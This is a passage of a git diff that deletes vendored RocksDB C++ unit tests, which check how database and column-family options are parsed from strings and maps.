-                             "log_file_time_to_roll=3097;"
-                             "max_background_flushes=35;"
-                             "create_if_missing=false;"
-                             "error_if_exists=true;"
-                             "delayed_write_rate=4294976214;"
-                             "manifest_preallocation_size=1222;"
-                             "allow_mmap_writes=false;"
-                             "stats_dump_period_sec=70127;"
-                             "allow_fallocate=true;"
-                             "allow_mmap_reads=false;"
-                             "use_direct_reads=false;"
-                             "use_direct_io_for_flush_and_compaction=false;"
-                             "max_log_file_size=4607;"
-                             "random_access_max_buffer_size=1048576;"
-                             "advise_random_on_open=true;"
-                             "fail_if_options_file_error=false;"
-                             "enable_pipelined_write=false;"
-                             "allow_concurrent_memtable_write=true;"
-                             "wal_recovery_mode=kPointInTimeRecovery;"
-                             "enable_write_thread_adaptive_yield=true;"
-                             "write_thread_slow_yield_usec=5;"
-                             "write_thread_max_yield_usec=1000;"
-                             "access_hint_on_compaction_start=NONE;"
-                             "info_log_level=DEBUG_LEVEL;"
-                             "dump_malloc_stats=false;"
-                             "allow_2pc=false;"
-                             "avoid_flush_during_recovery=false;"
-                             "avoid_flush_during_shutdown=false;"
-                             "allow_ingest_behind=false;"
-                             "concurrent_prepare=false;"
-                             "manual_wal_flush=false;",
-                             new_options));
-
-  ASSERT_EQ(unset_bytes_base, NumUnsetBytes(new_options_ptr, sizeof(DBOptions),
-                                            kDBOptionsBlacklist));
-
-  options->~DBOptions();
-  new_options->~DBOptions();
-
-  delete[] options_ptr;
-  delete[] new_options_ptr;
-}
-
-// If the test fails, likely a new option is added to ColumnFamilyOptions
-// but it cannot be set through GetColumnFamilyOptionsFromString(), or the
-// test is not updated accordingly.
-// After adding an option, we need to make sure it is settable by
-// GetColumnFamilyOptionsFromString() and add the option to the input
-// string passed to GetColumnFamilyOptionsFromString()in this test.
-// If it is a complicated type, you also need to add the field to
-// kColumnFamilyOptionsBlacklist, and maybe add customized verification
-// for it.
-TEST_F(OptionsSettableTest, ColumnFamilyOptionsAllFieldsSettable) {
-  // options in the blacklist need to appear in the same order as in
-  // ColumnFamilyOptions.
-  const OffsetGap kColumnFamilyOptionsBlacklist = {
-      {offset_of(&ColumnFamilyOptions::inplace_callback),
-       sizeof(UpdateStatus(*)(char*, uint32_t*, Slice, std::string*))},
-      {offset_of(
-           &ColumnFamilyOptions::memtable_insert_with_hint_prefix_extractor),
-       sizeof(std::shared_ptr<const SliceTransform>)},
-      {offset_of(&ColumnFamilyOptions::compression_per_level),
-       sizeof(std::vector<CompressionType>)},
-      {offset_of(
-           &ColumnFamilyOptions::max_bytes_for_level_multiplier_additional),
-       sizeof(std::vector<int>)},
-      {offset_of(&ColumnFamilyOptions::memtable_factory),
-       sizeof(std::shared_ptr<MemTableRepFactory>)},
-      {offset_of(&ColumnFamilyOptions::table_properties_collector_factories),
-       sizeof(ColumnFamilyOptions::TablePropertiesCollectorFactories)},
-      {offset_of(&ColumnFamilyOptions::comparator), sizeof(Comparator*)},
-      {offset_of(&ColumnFamilyOptions::merge_operator),
-       sizeof(std::shared_ptr<MergeOperator>)},
-      {offset_of(&ColumnFamilyOptions::compaction_filter),
-       sizeof(const CompactionFilter*)},
-      {offset_of(&ColumnFamilyOptions::compaction_filter_factory),
-       sizeof(std::shared_ptr<CompactionFilterFactory>)},
-      {offset_of(&ColumnFamilyOptions::prefix_extractor),
-       sizeof(std::shared_ptr<const SliceTransform>)},
-      {offset_of(&ColumnFamilyOptions::table_factory),
-       sizeof(std::shared_ptr<TableFactory>)},
-  };
-
-  char* options_ptr = new char[sizeof(ColumnFamilyOptions)];
-
-  // Count padding bytes by setting all bytes in the memory to a special char,
-  // copy a well constructed struct to this memory and see how many special
-  // bytes left.
-  ColumnFamilyOptions* options = new (options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-  // It based on the behavior of compiler that padding bytes are not changed
-  // when copying the struct. It's prone to failure when compiler behavior
-  // changes. We verify there is unset bytes to detect the case.
-  *options = ColumnFamilyOptions();
-
-  // Deprecatd option which is not initialized. Need to set it to avoid
-  // Valgrind error
-  options->max_mem_compaction_level = 0;
-
-  int unset_bytes_base = NumUnsetBytes(options_ptr, sizeof(ColumnFamilyOptions),
-                                       kColumnFamilyOptionsBlacklist);
-  ASSERT_GT(unset_bytes_base, 0);
-  options->~ColumnFamilyOptions();
-
-  options = new (options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-
-  // Following options are not settable through
-  // GetColumnFamilyOptionsFromString():
-  options->rate_limit_delay_max_milliseconds = 33;
-  options->compaction_options_universal = CompactionOptionsUniversal();
-  options->compression_opts = CompressionOptions();
-  options->hard_rate_limit = 0;
-  options->soft_rate_limit = 0;
-  options->compaction_options_fifo = CompactionOptionsFIFO();
-  options->max_mem_compaction_level = 0;
-
-  char* new_options_ptr = new char[sizeof(ColumnFamilyOptions)];
-  ColumnFamilyOptions* new_options =
-      new (new_options_ptr) ColumnFamilyOptions();
-  FillWithSpecialChar(new_options_ptr, sizeof(ColumnFamilyOptions),
-                      kColumnFamilyOptionsBlacklist);
-
-  // Need to update the option string if a new option is added.
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      *options,
-      "compaction_filter_factory=mpudlojcujCompactionFilterFactory;"
-      "table_factory=PlainTable;"
-      "prefix_extractor=rocksdb.CappedPrefix.13;"
-      "comparator=leveldb.BytewiseComparator;"
-      "compression_per_level=kBZip2Compression:kBZip2Compression:"
-      "kBZip2Compression:kNoCompression:kZlibCompression:kBZip2Compression:"
-      "kSnappyCompression;"
-      "max_bytes_for_level_base=986;"
-      "bloom_locality=8016;"
-      "target_file_size_base=4294976376;"
-      "memtable_huge_page_size=2557;"
-      "max_successive_merges=5497;"
-      "max_sequential_skip_in_iterations=4294971408;"
-      "arena_block_size=1893;"
-      "target_file_size_multiplier=35;"
-      "min_write_buffer_number_to_merge=9;"
-      "max_write_buffer_number=84;"
-      "write_buffer_size=1653;"
-      "max_compaction_bytes=64;"
-      "max_bytes_for_level_multiplier=60;"
-      "memtable_factory=SkipListFactory;"
-      "compression=kNoCompression;"
-      "bottommost_compression=kDisableCompressionOption;"
-      "level0_stop_writes_trigger=33;"
-      "num_levels=99;"
-      "level0_slowdown_writes_trigger=22;"
-      "level0_file_num_compaction_trigger=14;"
-      "compaction_filter=urxcqstuwnCompactionFilter;"
-      "soft_rate_limit=530.615385;"
-      "soft_pending_compaction_bytes_limit=0;"
-      "max_write_buffer_number_to_maintain=84;"
-      "merge_operator=aabcxehazrMergeOperator;"
-      "memtable_prefix_bloom_size_ratio=0.4642;"
-      "memtable_insert_with_hint_prefix_extractor=rocksdb.CappedPrefix.13;"
-      "paranoid_file_checks=true;"
-      "force_consistency_checks=true;"
-      "inplace_update_num_locks=7429;"
-      "optimize_filters_for_hits=false;"
-      "level_compaction_dynamic_level_bytes=false;"
-      "inplace_update_support=false;"
-      "compaction_style=kCompactionStyleFIFO;"
-      "compaction_pri=kMinOverlappingRatio;"
-      "purge_redundant_kvs_while_flush=true;"
-      "hard_pending_compaction_bytes_limit=0;"
-      "disable_auto_compactions=false;"
-      "report_bg_io_stats=true;",
-      new_options));
-
-  ASSERT_EQ(unset_bytes_base,
-            NumUnsetBytes(new_options_ptr, sizeof(ColumnFamilyOptions),
-                          kColumnFamilyOptionsBlacklist));
-
-  options->~ColumnFamilyOptions();
-  new_options->~ColumnFamilyOptions();
-
-  delete[] options_ptr;
-  delete[] new_options_ptr;
-}
-#endif  // !__clang__
-#endif  // OS_LINUX || OS_WIN
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/options/options_test.cc b/thirdparty/rocksdb/options/options_test.cc
deleted file mode 100644
index fc4939b..0000000
--- a/thirdparty/rocksdb/options/options_test.cc
+++ /dev/null
@@ -1,1655 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cctype>
-#include <cstring>
-#include <unordered_map>
-#include <inttypes.h>
-
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "options/options_sanity_check.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/utilities/leveldb_options.h"
-#include "util/random.h"
-#include "util/stderr_logger.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifndef GFLAGS
-bool FLAGS_enable_print = false;
-#else
-#include <gflags/gflags.h>
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_bool(enable_print, false, "Print options generated to console.");
-#endif  // GFLAGS
-
-namespace rocksdb {
-
-class OptionsTest : public testing::Test {};
-
-#ifndef ROCKSDB_LITE  // GetOptionsFromMap is not supported in ROCKSDB_LITE
-TEST_F(OptionsTest, GetOptionsFromMapTest) {
-  std::unordered_map<std::string, std::string> cf_options_map = {
-      {"write_buffer_size", "1"},
-      {"max_write_buffer_number", "2"},
-      {"min_write_buffer_number_to_merge", "3"},
-      {"max_write_buffer_number_to_maintain", "99"},
-      {"compression", "kSnappyCompression"},
-      {"compression_per_level",
-       "kNoCompression:"
-       "kSnappyCompression:"
-       "kZlibCompression:"
-       "kBZip2Compression:"
-       "kLZ4Compression:"
-       "kLZ4HCCompression:"
-       "kXpressCompression:"
-       "kZSTD:"
-       "kZSTDNotFinalCompression"},
-      {"bottommost_compression", "kLZ4Compression"},
-      {"compression_opts", "4:5:6:7"},
-      {"num_levels", "8"},
-      {"level0_file_num_compaction_trigger", "8"},
-      {"level0_slowdown_writes_trigger", "9"},
-      {"level0_stop_writes_trigger", "10"},
-      {"target_file_size_base", "12"},
-      {"target_file_size_multiplier", "13"},
-      {"max_bytes_for_level_base", "14"},
-      {"level_compaction_dynamic_level_bytes", "true"},
-      {"max_bytes_for_level_multiplier", "15.0"},
-      {"max_bytes_for_level_multiplier_additional", "16:17:18"},
-      {"max_compaction_bytes", "21"},
-      {"soft_rate_limit", "1.1"},
-      {"hard_rate_limit", "2.1"},
-      {"hard_pending_compaction_bytes_limit", "211"},
-      {"arena_block_size", "22"},
-      {"disable_auto_compactions", "true"},
-      {"compaction_style", "kCompactionStyleLevel"},
-      {"compaction_pri", "kOldestSmallestSeqFirst"},
-      {"verify_checksums_in_compaction", "false"},
-      {"compaction_options_fifo", "23"},
-      {"max_sequential_skip_in_iterations", "24"},
-      {"inplace_update_support", "true"},
-      {"report_bg_io_stats", "true"},
-      {"compaction_measure_io_stats", "false"},
-      {"inplace_update_num_locks", "25"},
-      {"memtable_prefix_bloom_size_ratio", "0.26"},
-      {"memtable_huge_page_size", "28"},
-      {"bloom_locality", "29"},
-      {"max_successive_merges", "30"},
-      {"min_partial_merge_operands", "31"},
-      {"prefix_extractor", "fixed:31"},
-      {"optimize_filters_for_hits", "true"},
-  };
-
-  std::unordered_map<std::string, std::string> db_options_map = {
-      {"create_if_missing", "false"},
-      {"create_missing_column_families", "true"},
-      {"error_if_exists", "false"},
-      {"paranoid_checks", "true"},
-      {"max_open_files", "32"},
-      {"max_total_wal_size", "33"},
-      {"use_fsync", "true"},
-      {"db_log_dir", "/db_log_dir"},
-      {"wal_dir", "/wal_dir"},
-      {"delete_obsolete_files_period_micros", "34"},
-      {"max_background_compactions", "35"},
-      {"max_background_flushes", "36"},
-      {"max_log_file_size", "37"},
-      {"log_file_time_to_roll", "38"},
-      {"keep_log_file_num", "39"},
-      {"recycle_log_file_num", "5"},
-      {"max_manifest_file_size", "40"},
-      {"table_cache_numshardbits", "41"},
-      {"WAL_ttl_seconds", "43"},
-      {"WAL_size_limit_MB", "44"},
-      {"manifest_preallocation_size", "45"},
-      {"allow_mmap_reads", "true"},
-      {"allow_mmap_writes", "false"},
-      {"use_direct_reads", "false"},
-      {"use_direct_io_for_flush_and_compaction", "false"},
-      {"is_fd_close_on_exec", "true"},
-      {"skip_log_error_on_recovery", "false"},
-      {"stats_dump_period_sec", "46"},
-      {"advise_random_on_open", "true"},
-      {"use_adaptive_mutex", "false"},
-      {"new_table_reader_for_compaction_inputs", "true"},
-      {"compaction_readahead_size", "100"},
-      {"random_access_max_buffer_size", "3145728"},
-      {"writable_file_max_buffer_size", "314159"},
-      {"bytes_per_sync", "47"},
-      {"wal_bytes_per_sync", "48"},
-  };
-
-  ColumnFamilyOptions base_cf_opt;
-  ColumnFamilyOptions new_cf_opt;
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(
-            base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 1U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 2);
-  ASSERT_EQ(new_cf_opt.min_write_buffer_number_to_merge, 3);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number_to_maintain, 99);
-  ASSERT_EQ(new_cf_opt.compression, kSnappyCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level.size(), 9U);
-  ASSERT_EQ(new_cf_opt.compression_per_level[0], kNoCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[1], kSnappyCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[2], kZlibCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[3], kBZip2Compression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[4], kLZ4Compression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[5], kLZ4HCCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[6], kXpressCompression);
-  ASSERT_EQ(new_cf_opt.compression_per_level[7], kZSTD);
-  ASSERT_EQ(new_cf_opt.compression_per_level[8], kZSTDNotFinalCompression);
-  ASSERT_EQ(new_cf_opt.compression_opts.window_bits, 4);
-  ASSERT_EQ(new_cf_opt.compression_opts.level, 5);
-  ASSERT_EQ(new_cf_opt.compression_opts.strategy, 6);
-  ASSERT_EQ(new_cf_opt.compression_opts.max_dict_bytes, 7);
-  ASSERT_EQ(new_cf_opt.bottommost_compression, kLZ4Compression);
-  ASSERT_EQ(new_cf_opt.num_levels, 8);
-  ASSERT_EQ(new_cf_opt.level0_file_num_compaction_trigger, 8);
-  ASSERT_EQ(new_cf_opt.level0_slowdown_writes_trigger, 9);
-  ASSERT_EQ(new_cf_opt.level0_stop_writes_trigger, 10);
-  ASSERT_EQ(new_cf_opt.target_file_size_base, static_cast<uint64_t>(12));
-  ASSERT_EQ(new_cf_opt.target_file_size_multiplier, 13);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_base, 14U);
-  ASSERT_EQ(new_cf_opt.level_compaction_dynamic_level_bytes, true);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier, 15.0);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional.size(), 3U);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[0], 16);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[1], 17);
-  ASSERT_EQ(new_cf_opt.max_bytes_for_level_multiplier_additional[2], 18);
-  ASSERT_EQ(new_cf_opt.max_compaction_bytes, 21);
-  ASSERT_EQ(new_cf_opt.hard_pending_compaction_bytes_limit, 211);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 22U);
-  ASSERT_EQ(new_cf_opt.disable_auto_compactions, true);
-  ASSERT_EQ(new_cf_opt.compaction_style, kCompactionStyleLevel);
-  ASSERT_EQ(new_cf_opt.compaction_pri, kOldestSmallestSeqFirst);
-  ASSERT_EQ(new_cf_opt.compaction_options_fifo.max_table_files_size,
-            static_cast<uint64_t>(23));
-  ASSERT_EQ(new_cf_opt.max_sequential_skip_in_iterations,
-            static_cast<uint64_t>(24));
-  ASSERT_EQ(new_cf_opt.inplace_update_support, true);
-  ASSERT_EQ(new_cf_opt.inplace_update_num_locks, 25U);
-  ASSERT_EQ(new_cf_opt.memtable_prefix_bloom_size_ratio, 0.26);
-  ASSERT_EQ(new_cf_opt.memtable_huge_page_size, 28U);
-  ASSERT_EQ(new_cf_opt.bloom_locality, 29U);
-  ASSERT_EQ(new_cf_opt.max_successive_merges, 30U);
-  ASSERT_TRUE(new_cf_opt.prefix_extractor != nullptr);
-  ASSERT_EQ(new_cf_opt.optimize_filters_for_hits, true);
-  ASSERT_EQ(std::string(new_cf_opt.prefix_extractor->Name()),
-            "rocksdb.FixedPrefix.31");
-
-  cf_options_map["write_buffer_size"] = "hello";
-  ASSERT_NOK(GetColumnFamilyOptionsFromMap(
-             base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  cf_options_map["write_buffer_size"] = "1";
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(
-            base_cf_opt, cf_options_map, &new_cf_opt));
-
-  cf_options_map["unknown_option"] = "1";
-  ASSERT_NOK(GetColumnFamilyOptionsFromMap(
-             base_cf_opt, cf_options_map, &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_OK(GetColumnFamilyOptionsFromMap(base_cf_opt, cf_options_map,
-                                          &new_cf_opt,
-                                          false, /* input_strings_escaped  */
-                                          true /* ignore_unknown_options */));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-      base_cf_opt, new_cf_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility*/));
-  ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-      base_cf_opt, new_cf_opt, nullptr, /* new_opt_map */
-      kSanityLevelExactMatch /* default for VerifyCFOptions */));
-
-  DBOptions base_db_opt;
-  DBOptions new_db_opt;
-  ASSERT_OK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_EQ(new_db_opt.create_if_missing, false);
-  ASSERT_EQ(new_db_opt.create_missing_column_families, true);
-  ASSERT_EQ(new_db_opt.error_if_exists, false);
-  ASSERT_EQ(new_db_opt.paranoid_checks, true);
-  ASSERT_EQ(new_db_opt.max_open_files, 32);
-  ASSERT_EQ(new_db_opt.max_total_wal_size, static_cast<uint64_t>(33));
-  ASSERT_EQ(new_db_opt.use_fsync, true);
-  ASSERT_EQ(new_db_opt.db_log_dir, "/db_log_dir");
-  ASSERT_EQ(new_db_opt.wal_dir, "/wal_dir");
-  ASSERT_EQ(new_db_opt.delete_obsolete_files_period_micros,
-            static_cast<uint64_t>(34));
-  ASSERT_EQ(new_db_opt.max_background_compactions, 35);
-  ASSERT_EQ(new_db_opt.max_background_flushes, 36);
-  ASSERT_EQ(new_db_opt.max_log_file_size, 37U);
-  ASSERT_EQ(new_db_opt.log_file_time_to_roll, 38U);
-  ASSERT_EQ(new_db_opt.keep_log_file_num, 39U);
-  ASSERT_EQ(new_db_opt.recycle_log_file_num, 5U);
-  ASSERT_EQ(new_db_opt.max_manifest_file_size, static_cast<uint64_t>(40));
-  ASSERT_EQ(new_db_opt.table_cache_numshardbits, 41);
-  ASSERT_EQ(new_db_opt.WAL_ttl_seconds, static_cast<uint64_t>(43));
-  ASSERT_EQ(new_db_opt.WAL_size_limit_MB, static_cast<uint64_t>(44));
-  ASSERT_EQ(new_db_opt.manifest_preallocation_size, 45U);
-  ASSERT_EQ(new_db_opt.allow_mmap_reads, true);
-  ASSERT_EQ(new_db_opt.allow_mmap_writes, false);
-  ASSERT_EQ(new_db_opt.use_direct_reads, false);
-  ASSERT_EQ(new_db_opt.use_direct_io_for_flush_and_compaction, false);
-  ASSERT_EQ(new_db_opt.is_fd_close_on_exec, true);
-  ASSERT_EQ(new_db_opt.skip_log_error_on_recovery, false);
-  ASSERT_EQ(new_db_opt.stats_dump_period_sec, 46U);
-  ASSERT_EQ(new_db_opt.advise_random_on_open, true);
-  ASSERT_EQ(new_db_opt.use_adaptive_mutex, false);
-  ASSERT_EQ(new_db_opt.new_table_reader_for_compaction_inputs, true);
-  ASSERT_EQ(new_db_opt.compaction_readahead_size, 100);
-  ASSERT_EQ(new_db_opt.random_access_max_buffer_size, 3145728);
-  ASSERT_EQ(new_db_opt.writable_file_max_buffer_size, 314159);
-  ASSERT_EQ(new_db_opt.bytes_per_sync, static_cast<uint64_t>(47));
-  ASSERT_EQ(new_db_opt.wal_bytes_per_sync, static_cast<uint64_t>(48));
-
-  db_options_map["max_open_files"] = "hello";
-  ASSERT_NOK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_db_opt, new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility */));
-
-  // unknow options should fail parsing without ignore_unknown_options = true
-  db_options_map["unknown_db_option"] = "1";
-  ASSERT_NOK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(base_db_opt, new_db_opt));
-
-  ASSERT_OK(GetDBOptionsFromMap(base_db_opt, db_options_map, &new_db_opt,
-                                false, /* input_strings_escaped  */
-                                true /* ignore_unknown_options */));
-  ASSERT_OK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_map */
-      kSanityLevelLooselyCompatible /* from CheckOptionsCompatibility */));
-  ASSERT_NOK(RocksDBOptionsParser::VerifyDBOptions(
-      base_db_opt, new_db_opt, nullptr, /* new_opt_mat */
-      kSanityLevelExactMatch /* default for VerifyDBOptions */));
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // GetColumnFamilyOptionsFromString is not supported in
-                      // ROCKSDB_LITE
-TEST_F(OptionsTest, GetColumnFamilyOptionsFromStringTest) {
-  ColumnFamilyOptions base_cf_opt;
-  ColumnFamilyOptions new_cf_opt;
-  base_cf_opt.table_factory.reset();
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt, "", &new_cf_opt));
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=5", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 5U);
-  ASSERT_TRUE(new_cf_opt.table_factory == nullptr);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=6;", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 6U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "  write_buffer_size =  7  ", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 7U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "  write_buffer_size =  8 ; ", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 8U);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=9;max_write_buffer_number=10", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 9U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 10);
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=11; max_write_buffer_number  =  12 ;",
-            &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 11U);
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 12);
-  // Wrong name "max_write_buffer_number_"
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number_=14;",
-              &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Wrong key/value pair
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Error Paring value
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13;max_write_buffer_number=;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Missing option name
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=13; =100;", &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  const int64_t kilo = 1024UL;
-  const int64_t mega = 1024 * kilo;
-  const int64_t giga = 1024 * mega;
-  const int64_t tera = 1024 * giga;
-
-  // Units (k)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      base_cf_opt, "max_write_buffer_number=15K", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 15 * kilo);
-  // Units (m)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "max_write_buffer_number=16m;inplace_update_num_locks=17M",
-            &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.max_write_buffer_number, 16 * mega);
-  ASSERT_EQ(new_cf_opt.inplace_update_num_locks, 17 * mega);
-  // Units (g)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(
-      base_cf_opt,
-      "write_buffer_size=18g;prefix_extractor=capped:8;"
-      "arena_block_size=19G",
-      &new_cf_opt));
-
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 18 * giga);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 19 * giga);
-  ASSERT_TRUE(new_cf_opt.prefix_extractor.get() != nullptr);
-  std::string prefix_name(new_cf_opt.prefix_extractor->Name());
-  ASSERT_EQ(prefix_name, "rocksdb.CappedPrefix.8");
-
-  // Units (t)
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=20t;arena_block_size=21T", &new_cf_opt));
-  ASSERT_EQ(new_cf_opt.write_buffer_size, 20 * tera);
-  ASSERT_EQ(new_cf_opt.arena_block_size, 21 * tera);
-
-  // Nested block based table options
-  // Empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={};arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Non-empty
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={block_cache=1M;block_size=4;};"
-            "arena_block_size=1024",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Last one
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "write_buffer_size=10;max_write_buffer_number=16;"
-            "block_based_table_factory={block_cache=1M;block_size=4;}",
-            &new_cf_opt));
-  ASSERT_TRUE(new_cf_opt.table_factory != nullptr);
-  // Mismatch curly braces
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={{{block_size=4;};"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Unexpected chars after closing curly brace
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}};"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}xdfa;"
-             "arena_block_size=1024",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={block_size=4;}xdfa",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  // Invalid block based table option
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
-             "write_buffer_size=10;max_write_buffer_number=16;"
-             "block_based_table_factory={xx_block_size=4;}",
-             &new_cf_opt));
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(base_cf_opt, new_cf_opt));
-
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-           "optimize_filters_for_hits=true",
-           &new_cf_opt));
-  ASSERT_OK(GetColumnFamilyOptionsFromString(base_cf_opt,
-            "optimize_filters_for_hits=false",
-            &new_cf_opt));
-
-  ASSERT_NOK(GetColumnFamilyOptionsFromString(base_cf_opt,
